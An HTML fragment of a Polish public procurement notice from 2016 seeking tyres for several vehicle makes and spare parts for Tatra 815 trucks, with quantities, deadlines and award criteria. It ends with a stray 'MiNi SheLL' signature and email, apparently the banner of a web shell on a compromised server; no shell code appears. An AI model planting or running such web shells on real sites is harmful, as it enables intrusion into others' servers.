<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 22/09/2016, godzina: 08:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Dostawa ogumienia do pojazdów marki: FIAT DUCATO; MERCEDES 90 GD VW CRAFTER, LUBLIN<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest dostawa niżej wymienionego asortymentu opon w ilościach:
1.OPONA 195/70 R15C - FIAT DUCATO w ilości 35 szt. w tym:
  zamówienie gwarantowane - 5 szt.; zamówienie opcjonalne - 30 szt.
2.OPONA 195/70 R15C - FIAT DUCATO w ilości 35 szt. w tym:
  zamówienie gwarantowane - 5 szt.; zamówienie opcjonalne - 30 szt. 
3.OPONA 215/70 R15C - FIAT DUCATO w ilości 35 szt. w tym:
  zamówienie gwarantowane - 5 szt.; zamówienie opcjonalne - 30 szt.
4.OPONA 215/70 R15C - FIAT DUCATO w ilości 35 szt. w tym:
  zamówienie gwarantowane - 5 szt.; zamówienie opcjonalne - 30 szt.
5.OPONA 205/80/R16 - MERCEDES 290GD w ilości 35 szt. w tym:
  zamówienie gwarantowane - 5 szt.; zamówienie opcjonalne - 30 szt.
6.OPONA 205/80/R16 - MERCEDES 290GD w ilości 35 szt. w tym:
  zamówienie gwarantowane - 5 szt.; zamówienie opcjonalne - 30 szt.
7.OPONA 235/65/R16C - VW CRAFTER w ilości 35 szt. w tym:
  zamówienie gwarantowane - 5 szt.; zamówienie opcjonalne - 30 szt.
8.OPONA 235/65/R16C - VW CRAFTER w ilości 35 szt. w tym:
  zamówienie gwarantowane - 5 szt.; zamówienie opcjonalne - 30 szt.
9 OPONA 185R15C - LUBLIN w ilości 35 szt. w tym:
  zamówienie gwarantowane - 5 szt.; zamówienie opcjonalne - 30 szt.
10 OPONA 185R15C - LUBLIN w ilości 35 szt. w tym:
   zamówienie gwarantowane - 5 szt.; zamówienie opcjonalne - 30 szt.

Wymagania oraz szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>34300000-0, 34352100-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  80325.00<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/11/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin realizacji</td><td>20</td></tr><tr><td>Okres gwrancji</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Dostawa ogumienia do pojazdu marki HONKER<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest dostawa:
1.OPON 7.50R 16C - HONKER w ilości 35 szt. w tym:
  zamówienie gwarantowane - 5 szt.; zamówienie opcjonalne - 30 szt.         

Wymagania oraz szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>34300000-0, 34352100-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  80325.00<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/11/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin realizaji</td><td>20</td></tr><tr><td>Okres gwarancji</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Dostawa ogumienia do pojazdów marki IVECO TRAKER, przyczepy N 600, URSUS C 385<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest dostawa niżej wymienionego asortymentu opon w ilościach: 
1 OPONA 13 R22,5 - IVECO TRAKER	 w ilości 20 szt. w tym:
  zamówienie gwarantowane - 4 szt.; zamówienie opcjonalne - 16 szt.   
2 OPONA 235/75 R17,5 - PRZYCZEPA NS 600 w ilości 60 szt. w tym:
  zamówienie gwarantowane - 10 szt.; zamówienie opcjonalne - 50 szt.
3 OPONA 16,9-34 URSUS C 385 nie mniej niż 10 PR	w ilości 4 szt. w tym:   zamówienie  gwarantowane - 2 szt.; zamówienie opcjonalne - 2 szt.                

Wymagania oraz szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>34300000-0, 34352100-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  80325.00<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/11/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin realizacji</td><td>20</td></tr><tr><td>Okres gwarancji</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Dostawa ogumienia<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest dostawa niżej wymienionego asortymentu opon w ilościach:
1. OPONA 255/100 R16 IVECO w ilości 35 szt. w tym:
   zamówienie gwarantowane - 5 szt., zamówienie opcjonalne - 30 szt.
2. OPONA 265/70 R 17,5 w ilości 20 szt. w tym:
   zamówienie gwarantowane - 6 szt., zamówienie opcjonalne - 14 szt.
3. OPONA 365/80R20 T w ilości 15 szt. w tym:
   zamówienie gwarantowane - 5 szt., zamówienie opcjonalne - 10 szt.
4. OPONA 235/55 R17 w ilości 10 szt. w tym:
   zamówienie gwarantowane - 5 szt., zamówienie opcjonalne - 5 szt.

Wymagania oraz szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>34300000-0, 34352100-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  80325.00<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/11/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin realizacji</td><td>20</td></tr><tr><td>Okres gwarancji</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>Dostawa części zamiennych do pojazdu marki TATRA 815 "DANA"<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest dostawa niżej wymienionego asortymentu części zamiennych w ilościach:
1. FARTUCH WENT.SILNIKA w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
2. TARCZA SPRZĘ.TATRA w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
3. KRZYŻAK TATRA w ilości 4 szt. w tym:
   zamówienie gwarantowane - 2 szt. zamówienie opcjonalne - 2 szt.
4. DŹWIGNIA BIEG.TATRA w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
5. KOŁO KIER.TATRA w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
6. KOŃCÓWKA DRĄŻ.TATRA w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
7. KOŃCÓWKA DRĄŻ.TATRA w ilości 4 szt. w tym:
   zamówienie gwarantowane - 2 szt. zamówienie opcjonalne - 2 szt.
8. KOŃCÓWKA DRĄŻ.TATRA w ilości 4 szt. w tym:
   zamówienie gwarantowane - 2 szt. zamówienie opcjonalne - 2 szt.
9. WKŁAD FILTRA TATRA w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
10.REGULATOR CIŚN.TATRA w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
11.ZAWÓR ZAMK.TATRA w ilości 4 szt. w tym:
   zamówienie gwarantowane - 2 szt. zamówienie opcjonalne - 2 szt.
12.POMPA PMROZ.TATRA w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
13.ZAWÓR ZWR0TNY TATRA w ilości 4 szt. w tym:
   zamówienie gwarantowane - 2 szt. zamówienie opcjonalne - 2 szt. 
14.ZAWÓR ZABEZP.TATRA w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
15.REGULATOR KOMPENSACYJNY REGULATOR KOMPENSACYJNY w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt. 
16.ZAWÓR HAM.RĘCZ.TATRA w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
17.NAGRZEWNICA TATRA w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
18.RAMIĘ WYCIER.TATRA w ilości 4 szt. w tym:
   zamówienie gwarantowane - 2 szt. zamówienie opcjonalne - 2 szt.
19.PAS BEZPIECZEŃSTWA STATYCZNY w ilości 4 szt. w tym:
   zamówienie gwarantowane - 2 szt. zamówienie opcjonalne - 2 szt.
20.SPRYSKIW. SZYB TATRA w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
21.WKŁAD LUSTERKA ZEWNĘTRZNEGO "DANA" w ilości 4 szt. w tym:
   zamówienie gwarantowane - 2 szt. zamówienie opcjonalne - 2 szt.
22.PIERŚCIEŃ TŁOKOWY TATRA w ilości 12 szt. w tym:
   zamówienie gwarantowane - 6 szt. zamówienie opcjonalne - 6 szt.
23.PIERŚCIEŃ TŁOKOWY w ilości 12 szt. w tym:
   zamówienie gwarantowane - 6 szt. zamówienie opcjonalne - 6 szt.
24.PIERŚCIEŃ TŁOKOWY w ilości 12 szt. w tym:
   zamówienie gwarantowane - 6 szt. zamówienie opcjonalne - 6 szt. 
25.ŁĄCZNIK PRZEW.TATRA w ilości 4 szt. w tym:
   zamówienie gwarantowane - 2 szt. zamówienie opcjonalne - 2 szt.
26.ROZPYLACZ WTR.TATRA w ilości 12 szt. w tym:
   zamówienie gwarantowane - 6 szt. zamówienie opcjonalne - 6 szt. 
27.WKŁ.FILTRA PAL.TATRA w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
28.RĘCZNA POMP.PAL.TATRA w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
29.POMPA PALIWA TATRA w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
30.INSTALAC. URUCH.SILNIKA ETEREM TATRA 815 w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
31.ROZRUSZNIK TATRA w ilości 4 szt. w tym:
   zamówienie gwarantowane - 2 szt. zamówienie opcjonalne - 2 szt.
32.ALTERNATOR TATRA w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
33.WKŁAD FILTRU TATRA w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
34.WKŁAD FILTRA POWIETRZA w ilości 4 szt. w tym:
   zamówienie gwarantowane - 2 szt. zamówienie opcjonalne - 2 szt.
35.TŁUMIK WYDECHU TATRA w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
36.PASEK KLINOWY TATRA w ilości 4 szt. w tym:
   zamówienie gwarantowane - 2 szt. zamówienie opcjonalne - 2 szt.
37.TARCZA ZABIER.TATRA w ilości 4 szt. w tym:
   zamówienie gwarantowane - 2 szt. zamówienie opcjonalne - 2 szt.
38.SIŁOWNIK WSP.TATRA w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
39.SIŁOWNIK SPRZĘ.TATRA w ilości 4 szt. w tym:
   zamówienie gwarantowane - 2 szt. zamówienie opcjonalne - 2 szt.
40.SIŁOWNIK WYŁ.TATRA w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
41.LINKA PRĘDKO.TATRA w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
42.LINKA OBR.TATRA w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
43.LINKA LICZNIKA TATRA w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
44.PRZEWÓD TURBOSPRĘŻARKI w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
45.WĄŻ GUMOWY CIŚNIENIOWY w ilości 4 szt. w tym:
   zamówienie gwarantowane - 2 szt. zamówienie opcjonalne - 2 szt. 
46 PRZEWODY PNEUM.UKŁ.HAM.152MM AHS DANA w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
47.PRZEJŚCIÓWKA GUMOWA w ilości 4 szt. w tym:
   zamówienie gwarantowane - 2 szt. zamówienie opcjonalne - 2 szt.
48.SPRZĘGŁO PRZEWODÓW HAM. w ilości 4 szt. w tym:
   zamówienie gwarantowane - 2 szt. zamówienie opcjonalne - 2 szt.
49.ZAWÓR EM TATRA w ilości 10 szt. w tym:
   zamówienie gwarantowane - 5 szt. zamówienie opcjonalne - 5 szt.
50.ŚRUBA w ilości 12 szt. w tym:
   zamówienie gwarantowane - 6 szt. zamówienie opcjonalne - 6 szt.
51.PODKŁADKA w ilości 12 szt. w tym:
   zamówienie gwarantowane - 6 szt. zamówienie opcjonalne - 6 szt.
52.NAKRĘTKA SKRZYDEŁKOWA M8 w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
53.PIERŚCIEŃ OSAD.SPRĘŻ. w ilości 4 szt. w tym:
   zamówienie gwarantowane - 2 szt. zamówienie opcjonalne - 2 szt.
54.PIERŚCIEŃ SIMMERA w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
55.PIERŚCIEŃ SIMMERA w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
56.USZCZELKA w ilości 4 szt. w tym:
   zamówienie gwarantowane - 2 szt. zamówienie opcjonalne - 2 szt.
57.USZCZELKA w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
58.USZCZELKA w ilości 4 szt. w tym:
   zamówienie gwarantowane - 2 szt. zamówienie opcjonalne - 2 szt.
59.PIERŚCIEŃ SIMMERA w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
60.SZNUR USZCZELNIAJĄCY w ilości 4 szt. w tym:
   zamówienie gwarantowane - 2 szt. zamówienie opcjonalne - 2 szt.
61.PIERŚCIEŃ SIMMERA w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
62.USZCZELKI SILNIKA TATRA 815 KPL w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
63.PIERŚCIEŃ O-RING 8X3 w ilości 16 szt. w tym:
   zamówienie gwarantowane - 8 szt. zamówienie opcjonalne - 8 szt.
64.PRZERYWACZ KIERUNKOWSKAZÓW w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
65.WYŁĄCZNIK AUTOMATYCZNY w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
66.WYŁĄCZNIK AUTOMATYCZNY w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
67.WYŁĄCZNIK ZAPŁONU w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
68.PRZEŁĄCZNIK ŚWIATEŁ AWARYJNYCH w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
69.WŁĄCZNIK TATRA w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
70.PRZEŁĄCZNIK ŚWIATEŁ w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
71.PRZEŁĄCZNIK ŚWIATEŁ w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
72.LAMPKA KONTROLNA ZIELONA w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
73.LAMPKA KONTROLNA CZERWONA w ilości 4 szt. w tym:
   zamówienie gwarantowane - 2 szt. zamówienie opcjonalne - 2 szt.
74.LAMPKA KONTROLNA ŻÓŁTA w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
75.LAMPA TYLNA TATRA w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
76.SYGNAŁ DŹWIĘKOWY WODOO.w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt. 
77.OBROTOMIERZ w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
78.CZUJNIK CIŚNIENIA w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
79.WOLTOMIERZ TAB. w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
80.PRĘDKOŚCIOMIERZ TATRA w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
81.CZUJNIK TEMP.OLEJU w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
82.CZUJNIK SILN.TATRA w ilości 2 szt. w tym:
   zamówienie gwarantowane - 1 szt. zamówienie opcjonalne - 1 szt.
83.OSŁONA w ilości 4 szt. w tym:
   zamówienie gwarantowane - 2 szt. zamówienie opcjonalne - 2 szt.
84.OSŁONA GUMOWA TATRA w ilości 4 szt. w tym:
   zamówienie gwarantowane - 2 szt. zamówienie opcjonalne - 2 szt.
85.MIESZEK PPYŁ.TATRA w ilości 4 szt. w tym:
   zamówienie gwarantowane - 2 szt. zamówienie opcjonalne - 2 szt.
86.MIESZEK PPYŁ.TATRA w ilości 4 szt. w tym:
   zamówienie gwarantowane - 2 szt. zamówienie opcjonalne - 2 szt.
87.NAKŁADKA PED.TATRA w ilości 4 szt. w tym:
   zamówienie gwarantowane - 2 szt. zamówienie opcjonalne - 2 szt.
88.OSŁONA PPYŁ.TATRA w ilości 4 szt. w tym:
   zamówienie gwarantowane - 2 szt. zamówienie opcjonalne - 2 szt.
89.AMORTYZATOR w ilości 4 szt. w tym:
   zamówienie gwarantowane - 2 szt. zamówienie opcjonalne - 2 szt.
90.PASEK w ilości 4 szt. w tym:
   zamówienie gwarantowane - 2 szt. zamówienie opcjonalne - 2 szt.
91.PASEK w ilości 4 szt. w tym:
   zamówienie gwarantowane - 2 szt. zamówienie opcjonalne - 2 szt.





<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>34300000-0, 34352100-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  80325.00<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/11/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin realizacji</td><td>20</td></tr><tr><td>Okres gwarancji</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com